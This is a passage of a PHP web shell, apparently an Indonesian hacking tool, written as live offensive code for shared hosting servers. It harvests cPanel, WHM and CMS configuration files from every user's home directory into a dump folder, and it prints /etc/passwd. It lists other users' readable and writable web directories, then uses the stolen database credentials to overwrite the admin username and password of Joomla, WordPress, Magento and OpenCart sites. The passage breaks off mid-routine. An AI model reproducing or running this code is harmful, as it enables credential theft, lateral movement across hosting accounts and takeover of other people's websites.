3125.                     "/home1/$user_bad/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
3126.                     "/home1/$user_bad/public_html/Home/configuration.php" => "JoomlaHome",
3127.                     "/home1/$user_bad/public_html/HOME/configuration.php" => "JoomlaHome",
3128.                     "/home1/$user_bad/public_html/home/configuration.php" => "JoomlaHome",
3129.                     "/home1/$user_bad/public_html/NEW/configuration.php" => "JoomlaNew",
3130.                     "/home1/$user_bad/public_html/New/configuration.php" => "JoomlaNew",
3131.                     "/home1/$user_bad/public_html/new/configuration.php" => "JoomlaNew",
3132.                     "/home1/$user_bad/public_html/News/configuration.php" => "JoomlaNews",
3133.                     "/home1/$user_bad/public_html/NEWS/configuration.php" => "JoomlaNews",
3134.                     "/home1/$user_bad/public_html/news/configuration.php" => "JoomlaNews",
3135.                     "/home1/$user_bad/public_html/Cms/configuration.php" => "JoomlaCms",
3136.                     "/home1/$user_bad/public_html/CMS/configuration.php" => "JoomlaCms",
3137.                     "/home1/$user_bad/public_html/cms/configuration.php" => "JoomlaCms",
3138.                     "/home1/$user_bad/public_html/Main/configuration.php" => "JoomlaMain",
3139.                     "/home1/$user_bad/public_html/MAIN/configuration.php" => "JoomlaMain",
3140.                     "/home1/$user_bad/public_html/main/configuration.php" => "JoomlaMain",
3141.                     "/home1/$user_bad/public_html/Blog/configuration.php" => "JoomlaBlog",
3142.                     "/home1/$user_bad/public_html/BLOG/configuration.php" => "JoomlaBlog",
3143.                     "/home1/$user_bad/public_html/blog/configuration.php" => "JoomlaBlog",
3144.                     "/home1/$user_bad/public_html/Blogs/configuration.php" => "JoomlaBlogs",
3145.                     "/home1/$user_bad/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
3146.                     "/home1/$user_bad/public_html/blogs/configuration.php" => "JoomlaBlogs",
3147.                     "/home1/$user_bad/public_html/beta/configuration.php" => "JoomlaBeta",
3148.                     "/home1/$user_bad/public_html/Beta/configuration.php" => "JoomlaBeta",
3149.                     "/home1/$user_bad/public_html/BETA/configuration.php" => "JoomlaBeta",
3150.                     "/home1/$user_bad/public_html/PRESS/configuration.php" => "JoomlaPress",
3151.                     "/home1/$user_bad/public_html/Press/configuration.php" => "JoomlaPress",
3152.                     "/home1/$user_bad/public_html/press/configuration.php" => "JoomlaPress",
3153.                     "/home1/$user_bad/public_html/Wp/configuration.php" => "JoomlaWp",
3154.                     "/home1/$user_bad/public_html/wp/configuration.php" => "JoomlaWp",
3155.                     "/home1/$user_bad/public_html/WP/configuration.php" => "JoomlaWP",
3156.                     "/home1/$user_bad/public_html/portal/configuration.php" => "JoomlaPortal",
3157.                     "/home1/$user_bad/public_html/PORTAL/configuration.php" => "JoomlaPortal",
3158.                     "/home1/$user_bad/public_html/Portal/configuration.php" => "JoomlaPortal",                 
3159.                     "/home1/$user_bad/public_html/wp-config.php" => "WordPress",
3160.                     "/home1/$user_bad/public_html/wordpress/wp-config.php" => "WordPressWordpress",
3161.                     "/home1/$user_bad/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
3162.                     "/home1/$user_bad/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
3163.                     "/home1/$user_bad/public_html/Home/wp-config.php" => "WordPressHome",
3164.                     "/home1/$user_bad/public_html/HOME/wp-config.php" => "WordPressHome",
3165.                     "/home1/$user_bad/public_html/home/wp-config.php" => "WordPressHome",
3166.                     "/home1/$user_bad/public_html/NEW/wp-config.php" => "WordPressNew",
3167.                     "/home1/$user_bad/public_html/New/wp-config.php" => "WordPressNew",
3168.                     "/home1/$user_bad/public_html/new/wp-config.php" => "WordPressNew",
3169.                     "/home1/$user_bad/public_html/News/wp-config.php" => "WordPressNews",
3170.                     "/home1/$user_bad/public_html/NEWS/wp-config.php" => "WordPressNews",
3171.                     "/home1/$user_bad/public_html/news/wp-config.php" => "WordPressNews",
3172.                     "/home1/$user_bad/public_html/Cms/wp-config.php" => "WordPressCms",
3173.                     "/home1/$user_bad/public_html/CMS/wp-config.php" => "WordPressCms",
3174.                     "/home1/$user_bad/public_html/cms/wp-config.php" => "WordPressCms",
3175.                     "/home1/$user_bad/public_html/Main/wp-config.php" => "WordPressMain",
3176.                     "/home1/$user_bad/public_html/MAIN/wp-config.php" => "WordPressMain",
3177.                     "/home1/$user_bad/public_html/main/wp-config.php" => "WordPressMain",
3178.                     "/home1/$user_bad/public_html/Blog/wp-config.php" => "WordPressBlog",
3179.                     "/home1/$user_bad/public_html/BLOG/wp-config.php" => "WordPressBlog",
3180.                     "/home1/$user_bad/public_html/blog/wp-config.php" => "WordPressBlog",
3181.                     "/home1/$user_bad/public_html/Blogs/wp-config.php" => "WordPressBlogs",
3182.                     "/home1/$user_bad/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
3183.                     "/home1/$user_bad/public_html/blogs/wp-config.php" => "WordPressBlogs",
3184.                     "/home1/$user_bad/public_html/beta/wp-config.php" => "WordPressBeta",
3185.                     "/home1/$user_bad/public_html/Beta/wp-config.php" => "WordPressBeta",
3186.                     "/home1/$user_bad/public_html/BETA/wp-config.php" => "WordPressBeta",
3187.                     "/home1/$user_bad/public_html/PRESS/wp-config.php" => "WordPressPress",
3188.                     "/home1/$user_bad/public_html/Press/wp-config.php" => "WordPressPress",
3189.                     "/home1/$user_bad/public_html/press/wp-config.php" => "WordPressPress",
3190.                     "/home1/$user_bad/public_html/Wp/wp-config.php" => "WordPressWp",
3191.                     "/home1/$user_bad/public_html/wp/wp-config.php" => "WordPressWp",
3192.                     "/home1/$user_bad/public_html/WP/wp-config.php" => "WordPressWP",
3193.                     "/home1/$user_bad/public_html/portal/wp-config.php" => "WordPressPortal",
3194.                     "/home1/$user_bad/public_html/PORTAL/wp-config.php" => "WordPressPortal",
3195.                     "/home1/$user_bad/public_html/Portal/wp-config.php" => "WordPressPortal",
3196.                                         "/home2/$user_bad/.my.cnf" => "cpanel",
3197.                     "/home2/$user_bad/.accesshash" => "WHM-accesshash",
3198.                     "/home2/$user_bad/public_html/bw-configs/config.ini" => "BosWeb",
3199.                     "/home2/$user_bad/public_html/config/koneksi.php" => "Lokomedia",
3200.                     "/home2/$user_bad/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
3201.                     "/home2/$user_bad/public_html/clientarea/configuration.php" => "WHMCS",            
3202.                     "/home2/$user_bad/public_html/whmcs/configuration.php" => "WHMCS",
3203.                     "/home2/$user_bad/public_html/forum/config.php" => "phpBB",
3204.                     "/home2/$user_bad/public_html/sites/default/settings.php" => "Drupal",
3205.                     "/home2/$user_bad/public_html/config/settings.inc.php" => "PrestaShop",
3206.                     "/home2/$user_bad/public_html/app/etc/local.xml" => "Magento",
3207.                     "/home2/$user_bad/public_html/admin/config.php" => "OpenCart",
3208.                     "/home2/$user_bad/public_html/slconfig.php" => "Sitelok",
3209.                     "/home2/$user_bad/public_html/application/config/database.php" => "Ellislab",                  
3210.                     "/home2/$user_bad/public_html/whm/configuration.php" => "WHMCS",
3211.                     "/home2/$user_bad/public_html/whmc/WHM/configuration.ph" => "WHMC",
3212.                     "/home2/$user_bad/public_html/central/configuration.php" => "WHM Central",
3213.                     "/home2/$user_bad/public_html/whm/WHMCS/configuration.php" => "WHMCS",
3214.                     "/home2/$user_bad/public_html/whm/whmcs/configuration.php" => "WHMCS",
3215.                     "/home2/$user_bad/public_html/submitticket.php" => "WHMCS",                                    
3216.                     "/home2/$user_bad/public_html/configuration.php" => "Joomla",                  
3217.                     "/home2/$user_bad/public_html/Joomla/configuration.php" => "JoomlaJoomla",
3218.                     "/home2/$user_bad/public_html/joomla/configuration.php" => "JoomlaJoomla",
3219.                     "/home2/$user_bad/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
3220.                     "/home2/$user_bad/public_html/Home/configuration.php" => "JoomlaHome",
3221.                     "/home2/$user_bad/public_html/HOME/configuration.php" => "JoomlaHome",
3222.                     "/home2/$user_bad/public_html/home/configuration.php" => "JoomlaHome",
3223.                     "/home2/$user_bad/public_html/NEW/configuration.php" => "JoomlaNew",
3224.                     "/home2/$user_bad/public_html/New/configuration.php" => "JoomlaNew",
3225.                     "/home2/$user_bad/public_html/new/configuration.php" => "JoomlaNew",
3226.                     "/home2/$user_bad/public_html/News/configuration.php" => "JoomlaNews",
3227.                     "/home2/$user_bad/public_html/NEWS/configuration.php" => "JoomlaNews",
3228.                     "/home2/$user_bad/public_html/news/configuration.php" => "JoomlaNews",
3229.                     "/home2/$user_bad/public_html/Cms/configuration.php" => "JoomlaCms",
3230.                     "/home2/$user_bad/public_html/CMS/configuration.php" => "JoomlaCms",
3231.                     "/home2/$user_bad/public_html/cms/configuration.php" => "JoomlaCms",
3232.                     "/home2/$user_bad/public_html/Main/configuration.php" => "JoomlaMain",
3233.                     "/home2/$user_bad/public_html/MAIN/configuration.php" => "JoomlaMain",
3234.                     "/home2/$user_bad/public_html/main/configuration.php" => "JoomlaMain",
3235.                     "/home2/$user_bad/public_html/Blog/configuration.php" => "JoomlaBlog",
3236.                     "/home2/$user_bad/public_html/BLOG/configuration.php" => "JoomlaBlog",
3237.                     "/home2/$user_bad/public_html/blog/configuration.php" => "JoomlaBlog",
3238.                     "/home2/$user_bad/public_html/Blogs/configuration.php" => "JoomlaBlogs",
3239.                     "/home2/$user_bad/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
3240.                     "/home2/$user_bad/public_html/blogs/configuration.php" => "JoomlaBlogs",
3241.                     "/home2/$user_bad/public_html/beta/configuration.php" => "JoomlaBeta",
3242.                     "/home2/$user_bad/public_html/Beta/configuration.php" => "JoomlaBeta",
3243.                     "/home2/$user_bad/public_html/BETA/configuration.php" => "JoomlaBeta",
3244.                     "/home2/$user_bad/public_html/PRESS/configuration.php" => "JoomlaPress",
3245.                     "/home2/$user_bad/public_html/Press/configuration.php" => "JoomlaPress",
3246.                     "/home2/$user_bad/public_html/press/configuration.php" => "JoomlaPress",
3247.                     "/home2/$user_bad/public_html/Wp/configuration.php" => "JoomlaWp",
3248.                     "/home2/$user_bad/public_html/wp/configuration.php" => "JoomlaWp",
3249.                     "/home2/$user_bad/public_html/WP/configuration.php" => "JoomlaWP",
3250.                     "/home2/$user_bad/public_html/portal/configuration.php" => "JoomlaPortal",
3251.                     "/home2/$user_bad/public_html/PORTAL/configuration.php" => "JoomlaPortal",
3252.                     "/home2/$user_bad/public_html/Portal/configuration.php" => "JoomlaPortal",                 
3253.                     "/home2/$user_bad/public_html/wp-config.php" => "WordPress",
3254.                     "/home2/$user_bad/public_html/wordpress/wp-config.php" => "WordPressWordpress",
3255.                     "/home2/$user_bad/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
3256.                     "/home2/$user_bad/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
3257.                     "/home2/$user_bad/public_html/Home/wp-config.php" => "WordPressHome",
3258.                     "/home2/$user_bad/public_html/HOME/wp-config.php" => "WordPressHome",
3259.                     "/home2/$user_bad/public_html/home/wp-config.php" => "WordPressHome",
3260.                     "/home2/$user_bad/public_html/NEW/wp-config.php" => "WordPressNew",
3261.                     "/home2/$user_bad/public_html/New/wp-config.php" => "WordPressNew",
3262.                     "/home2/$user_bad/public_html/new/wp-config.php" => "WordPressNew",
3263.                     "/home2/$user_bad/public_html/News/wp-config.php" => "WordPressNews",
3264.                     "/home2/$user_bad/public_html/NEWS/wp-config.php" => "WordPressNews",
3265.                     "/home2/$user_bad/public_html/news/wp-config.php" => "WordPressNews",
3266.                     "/home2/$user_bad/public_html/Cms/wp-config.php" => "WordPressCms",
3267.                     "/home2/$user_bad/public_html/CMS/wp-config.php" => "WordPressCms",
3268.                     "/home2/$user_bad/public_html/cms/wp-config.php" => "WordPressCms",
3269.                     "/home2/$user_bad/public_html/Main/wp-config.php" => "WordPressMain",
3270.                     "/home2/$user_bad/public_html/MAIN/wp-config.php" => "WordPressMain",
3271.                     "/home2/$user_bad/public_html/main/wp-config.php" => "WordPressMain",
3272.                     "/home2/$user_bad/public_html/Blog/wp-config.php" => "WordPressBlog",
3273.                     "/home2/$user_bad/public_html/BLOG/wp-config.php" => "WordPressBlog",
3274.                     "/home2/$user_bad/public_html/blog/wp-config.php" => "WordPressBlog",
3275.                     "/home2/$user_bad/public_html/Blogs/wp-config.php" => "WordPressBlogs",
3276.                     "/home2/$user_bad/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
3277.                     "/home2/$user_bad/public_html/blogs/wp-config.php" => "WordPressBlogs",
3278.                     "/home2/$user_bad/public_html/beta/wp-config.php" => "WordPressBeta",
3279.                     "/home2/$user_bad/public_html/Beta/wp-config.php" => "WordPressBeta",
3280.                     "/home2/$user_bad/public_html/BETA/wp-config.php" => "WordPressBeta",
3281.                     "/home2/$user_bad/public_html/PRESS/wp-config.php" => "WordPressPress",
3282.                     "/home2/$user_bad/public_html/Press/wp-config.php" => "WordPressPress",
3283.                     "/home2/$user_bad/public_html/press/wp-config.php" => "WordPressPress",
3284.                     "/home2/$user_bad/public_html/Wp/wp-config.php" => "WordPressWp",
3285.                     "/home2/$user_bad/public_html/wp/wp-config.php" => "WordPressWp",
3286.                     "/home2/$user_bad/public_html/WP/wp-config.php" => "WordPressWP",
3287.                     "/home2/$user_bad/public_html/portal/wp-config.php" => "WordPressPortal",
3288.                     "/home2/$user_bad/public_html/PORTAL/wp-config.php" => "WordPressPortal",
3289.                     "/home2/$user_bad/public_html/Portal/wp-config.php" => "WordPressPortal",
3290.                     "/home3/$user_bad/.my.cnf" => "cpanel",
3291.                     "/home3/$user_bad/.accesshash" => "WHM-accesshash",
3292.                     "/home3/$user_bad/public_html/bw-configs/config.ini" => "BosWeb",
3293.                     "/home3/$user_bad/public_html/config/koneksi.php" => "Lokomedia",
3294.                     "/home3/$user_bad/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
3295.                     "/home3/$user_bad/public_html/clientarea/configuration.php" => "WHMCS",            
3296.                     "/home3/$user_bad/public_html/whmcs/configuration.php" => "WHMCS",
3297.                     "/home3/$user_bad/public_html/forum/config.php" => "phpBB",
3298.                     "/home3/$user_bad/public_html/sites/default/settings.php" => "Drupal",
3299.                     "/home3/$user_bad/public_html/config/settings.inc.php" => "PrestaShop",
3300.                     "/home3/$user_bad/public_html/app/etc/local.xml" => "Magento",
3301.                     "/home3/$user_bad/public_html/admin/config.php" => "OpenCart",
3302.                     "/home3/$user_bad/public_html/slconfig.php" => "Sitelok",
3303.                     "/home3/$user_bad/public_html/application/config/database.php" => "Ellislab",                  
3304.                     "/home3/$user_bad/public_html/whm/configuration.php" => "WHMCS",
3305.                     "/home3/$user_bad/public_html/whmc/WHM/configuration.ph" => "WHMC",
3306.                     "/home3/$user_bad/public_html/central/configuration.php" => "WHM Central",
3307.                     "/home3/$user_bad/public_html/whm/WHMCS/configuration.php" => "WHMCS",
3308.                     "/home3/$user_bad/public_html/whm/whmcs/configuration.php" => "WHMCS",
3309.                     "/home3/$user_bad/public_html/submitticket.php" => "WHMCS",                                    
3310.                     "/home3/$user_bad/public_html/configuration.php" => "Joomla",                  
3311.                     "/home3/$user_bad/public_html/Joomla/configuration.php" => "JoomlaJoomla",
3312.                     "/home3/$user_bad/public_html/joomla/configuration.php" => "JoomlaJoomla",
3313.                     "/home3/$user_bad/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",     
3314.                     "/home3/$user_bad/public_html/Home/configuration.php" => "JoomlaHome",
3315.                     "/home3/$user_bad/public_html/HOME/configuration.php" => "JoomlaHome",
3316.                     "/home3/$user_bad/public_html/home/configuration.php" => "JoomlaHome",
3317.                     "/home3/$user_bad/public_html/NEW/configuration.php" => "JoomlaNew",
3318.                     "/home3/$user_bad/public_html/New/configuration.php" => "JoomlaNew",
3319.                     "/home3/$user_bad/public_html/new/configuration.php" => "JoomlaNew",
3320.                     "/home3/$user_bad/public_html/News/configuration.php" => "JoomlaNews",
3321.                     "/home3/$user_bad/public_html/NEWS/configuration.php" => "JoomlaNews",
3322.                     "/home3/$user_bad/public_html/news/configuration.php" => "JoomlaNews",
3323.                     "/home3/$user_bad/public_html/Cms/configuration.php" => "JoomlaCms",
3324.                     "/home3/$user_bad/public_html/CMS/configuration.php" => "JoomlaCms",
3325.                     "/home3/$user_bad/public_html/cms/configuration.php" => "JoomlaCms",
3326.                     "/home3/$user_bad/public_html/Main/configuration.php" => "JoomlaMain",
3327.                     "/home3/$user_bad/public_html/MAIN/configuration.php" => "JoomlaMain",
3328.                     "/home3/$user_bad/public_html/main/configuration.php" => "JoomlaMain",
3329.                     "/home3/$user_bad/public_html/Blog/configuration.php" => "JoomlaBlog",
3330.                     "/home3/$user_bad/public_html/BLOG/configuration.php" => "JoomlaBlog",
3331.                     "/home3/$user_bad/public_html/blog/configuration.php" => "JoomlaBlog",
3332.                     "/home3/$user_bad/public_html/Blogs/configuration.php" => "JoomlaBlogs",
3333.                     "/home3/$user_bad/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
3334.                     "/home3/$user_bad/public_html/blogs/configuration.php" => "JoomlaBlogs",
3335.                     "/home3/$user_bad/public_html/beta/configuration.php" => "JoomlaBeta",
3336.                     "/home3/$user_bad/public_html/Beta/configuration.php" => "JoomlaBeta",
3337.                     "/home3/$user_bad/public_html/BETA/configuration.php" => "JoomlaBeta",
3338.                     "/home3/$user_bad/public_html/PRESS/configuration.php" => "JoomlaPress",
3339.                     "/home3/$user_bad/public_html/Press/configuration.php" => "JoomlaPress",
3340.                     "/home3/$user_bad/public_html/press/configuration.php" => "JoomlaPress",
3341.                     "/home3/$user_bad/public_html/Wp/configuration.php" => "JoomlaWp",
3342.                     "/home3/$user_bad/public_html/wp/configuration.php" => "JoomlaWp",
3343.                     "/home3/$user_bad/public_html/WP/configuration.php" => "JoomlaWP",
3344.                     "/home3/$user_bad/public_html/portal/configuration.php" => "JoomlaPortal",
3345.                     "/home3/$user_bad/public_html/PORTAL/configuration.php" => "JoomlaPortal",
3346.                     "/home3/$user_bad/public_html/Portal/configuration.php" => "JoomlaPortal",                 
3347.                     "/home3/$user_/public_html/wp-config.php" => "WordPress",
3348.                     "/home3/$user_bad/public_html/wordpress/wp-config.php" => "WordPressWordpress",
3349.                     "/home3/$user_bad/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
3350.                     "/home3/$user_bad/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",    
3351.                     "/home3/$user_bad/public_html/Home/wp-config.php" => "WordPressHome",
3352.                     "/home3/$user_bad/public_html/HOME/wp-config.php" => "WordPressHome",
3353.                     "/home3/$user_bad/public_html/home/wp-config.php" => "WordPressHome",
3354.                     "/home3/$user_bad/public_html/NEW/wp-config.php" => "WordPressNew",
3355.                     "/home3/$user_bad/public_html/New/wp-config.php" => "WordPressNew",
3356.                     "/home3/$user_bad/public_html/new/wp-config.php" => "WordPressNew",
3357.                     "/home3/$user_bad/public_html/News/wp-config.php" => "WordPressNews",
3358.                     "/home3/$user_bad/public_html/NEWS/wp-config.php" => "WordPressNews",
3359.                     "/home3/$user_bad/public_html/news/wp-config.php" => "WordPressNews",
3360.                     "/home3/$user_bad/public_html/Cms/wp-config.php" => "WordPressCms",
3361.                     "/home3/$user_bad/public_html/CMS/wp-config.php" => "WordPressCms",
3362.                     "/home3/$user_bad/public_html/cms/wp-config.php" => "WordPressCms",
3363.                     "/home3/$user_bad/public_html/Main/wp-config.php" => "WordPressMain",
3364.                     "/home3/$user_bad/public_html/MAIN/wp-config.php" => "WordPressMain",
3365.                     "/home3/$user_bad/public_html/main/wp-config.php" => "WordPressMain",
3366.                     "/home3/$user_bad/public_html/Blog/wp-config.php" => "WordPressBlog",
3367.                     "/home3/$user_bad/public_html/BLOG/wp-config.php" => "WordPressBlog",
3368.                     "/home3/$user_bad/public_html/blog/wp-config.php" => "WordPressBlog",
3369.                     "/home3/$user_bad/public_html/Blogs/wp-config.php" => "WordPressBlogs",
3370.                     "/home3/$user_bad/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
3371.                     "/home3/$user_bad/public_html/blogs/wp-config.php" => "WordPressBlogs",
3372.                     "/home3/$user_bad/public_html/beta/wp-config.php" => "WordPressBeta",
3373.                     "/home3/$user_bad/public_html/Beta/wp-config.php" => "WordPressBeta",
3374.                     "/home3/$user_bad/public_html/BETA/wp-config.php" => "WordPressBeta",
3375.                     "/home3/$user_bad/public_html/PRESS/wp-config.php" => "WordPressPress",
3376.                     "/home3/$user_bad/public_html/Press/wp-config.php" => "WordPressPress",
3377.                     "/home3/$user_bad/public_html/press/wp-config.php" => "WordPressPress",
3378.                     "/home3/$user_bad/public_html/Wp/wp-config.php" => "WordPressWp",
3379.                     "/home3/$user_bad/public_html/wp/wp-config.php" => "WordPressWp",
3380.                     "/home3/$user_bad/public_html/WP/wp-config.php" => "WordPressWP",
3381.                     "/home3/$user_bad/public_html/portal/wp-config.php" => "WordPressPortal",
3382.                     "/home3/$user_bad/public_html/PORTAL/wp-config.php" => "WordPressPortal",
3383.                     "/home3/$user_bad/public_html/Portal/wp-config.php" => "WordPressPortal"                   
3384.                         ); 
3385.                     foreach($grab_config as $config => $nama_config) {
3386.                         $ambil_config = file_get_contents($config);
3387.                         if($ambil_config == '') {
3388.                         } else {
3389.                             $file_config = fopen("bad_config/$user_bad-$nama_config.txt","w");
3390.                             fputs($file_config,$ambil_config);
3391.                         }
3392.                     }
3393.                 }      
3394.             }
3395.             echo "<center><a href='?dir=$dir/bad_config'><font color=lime>Done</font></a></center>";
3396.             }else{
3397.                
3398.         echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
3399.         echo file_get_contents('/etc/passwd');
3400.         echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
3401.         }
3402. } elseif($_GET['do'] == 'jumping') {
3403.     $i = 0;
3404.     echo "<pre><div class='margin: 5px auto;'>";
3405.     $etc = fopen("/etc/passwd", "r");
3406.     while($passwd = fgets($etc)) {
3407.         if($passwd == '' || !$etc) {
3408.             echo "<font color=red>Can't read /etc/passwd</font>";
3409.         } else {
3410.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
3411.             foreach($user_jumping[1] as $user_idx_jump) {
3412.                 $user_jumping_dir = "/home/$user_idx_jump/public_html";
3413.                 if(is_readable($user_jumping_dir)) {
3414.                     $i++;
3415.                     $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
3416.                     if(is_writable($user_jumping_dir)) {
3417.                         $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
3418.                     }
3419.                     echo $jrw;
3420.                     $domain_jump = file_get_contents("/etc/named.conf");   
3421.                     if($domain_jump == '') {
3422.                         echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
3423.                     } else {
3424.                         preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
3425.                         foreach($domains_jump[1] as $dj) {
3426.                             $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
3427.                             $user_jumping_url = $user_jumping_url['name'];
3428.                             if($user_jumping_url == $user_idx_jump) {
3429.                                 echo " => ( <u>$dj</u> )<br>";
3430.                                 break;
3431.                             }
3432.                         }
3433.                     }
3434.                 }
3435.             }
3436.         }
3437.     }
3438.     if($i == 0) {
3439.     } else {
3440.         echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
3441.     }
3442.     echo "</div></pre>";
3443. } elseif($_GET['do'] == 'auto_edit_user') {
3444.     if($_POST['hajar']) {
3445.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
3446.             echo "username atau password harus lebih dari 6 karakter";
3447.         } else {
3448.             $user_baru = $_POST['user_baru'];
3449.             $pass_baru = md5($_POST['pass_baru']);
3450.             $conf = $_POST['config_dir'];
3451.             $scan_conf = scandir($conf);
3452.             foreach($scan_conf as $file_conf) {
3453.                 if(!is_file("$conf/$file_conf")) continue;
3454.                 $config = file_get_contents("$conf/$file_conf");
3455.                 if(preg_match("/JConfig|joomla/",$config)) {
3456.                     $dbhost = ambilkata($config,"host = '","'");
3457.                     $dbuser = ambilkata($config,"user = '","'");
3458.                     $dbpass = ambilkata($config,"password = '","'");
3459.                     $dbname = ambilkata($config,"db = '","'");
3460.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
3461.                     $prefix = $dbprefix."users";
3462.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3463.                     $db = mysql_select_db($dbname);
3464.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3465.                     $result = mysql_fetch_array($q);
3466.                     $id = $result['id'];
3467.                     $site = ambilkata($config,"sitename = '","'");
3468.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
3469.                     echo "Config => ".$file_conf."<br>";
3470.                     echo "CMS => Joomla<br>";
3471.                     if($site == '') {
3472.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
3473.                     } else {
3474.                         echo "Sitename => $site<br>";
3475.                     }
3476.                     if(!$update OR !$conn OR !$db) {
3477.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3478.                     } else {
3479.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3480.                     }
3481.                     mysql_close($conn);
3482.                 } elseif(preg_match("/WordPress/",$config)) {
3483.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
3484.                     $dbuser = ambilkata($config,"DB_USER', '","'");
3485.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3486.                     $dbname = ambilkata($config,"DB_NAME', '","'");
3487.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
3488.                     $prefix = $dbprefix."users";
3489.                     $option = $dbprefix."options";
3490.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3491.                     $db = mysql_select_db($dbname);
3492.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3493.                     $result = mysql_fetch_array($q);
3494.                     $id = $result[ID];
3495.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3496.                     $result2 = mysql_fetch_array($q2);
3497.                     $target = $result2[option_value];
3498.                     if($target == '') {
3499.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3500.                     } else {
3501.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
3502.                     }
3503.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
3504.                     echo "Config => ".$file_conf."<br>";
3505.                     echo "CMS => Wordpress<br>";
3506.                     echo $url_target;
3507.                     if(!$update OR !$conn OR !$db) {
3508.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3509.                     } else {
3510.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3511.                     }
3512.                     mysql_close($conn);
3513.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
3514.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
3515.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
3516.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
3517.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
3518.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
3519.                     $prefix = $dbprefix."admin_user";
3520.                     $option = $dbprefix."core_config_data";
3521.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3522.                     $db = mysql_select_db($dbname);
3523.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
3524.                     $result = mysql_fetch_array($q);
3525.                     $id = $result[user_id];
3526.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
3527.                     $result2 = mysql_fetch_array($q2);
3528.                     $target = $result2[value];
3529.                     if($target == '') {
3530.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
3531.                     } else {
3532.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
3533.                     }
3534.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
3535.                     echo "Config => ".$file_conf."<br>";
3536.                     echo "CMS => Magento<br>";
3537.                     echo $url_target;
3538.                     if(!$update OR !$conn OR !$db) {
3539.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
3540.                     } else {
3541.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
3542.                     }
3543.                     mysql_close($conn);
3544.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
3545.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
3546.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
3547.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
3548.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
3549.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
3550.                     $prefix = $dbprefix."user";
3551.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3552.                     $db = mysql_select_db($dbname);
3553.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
3554.                     $result = mysql_fetch_array($q);
3555.                     $id = $result[user_id];
3556.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
3557.                     if($target == '') {
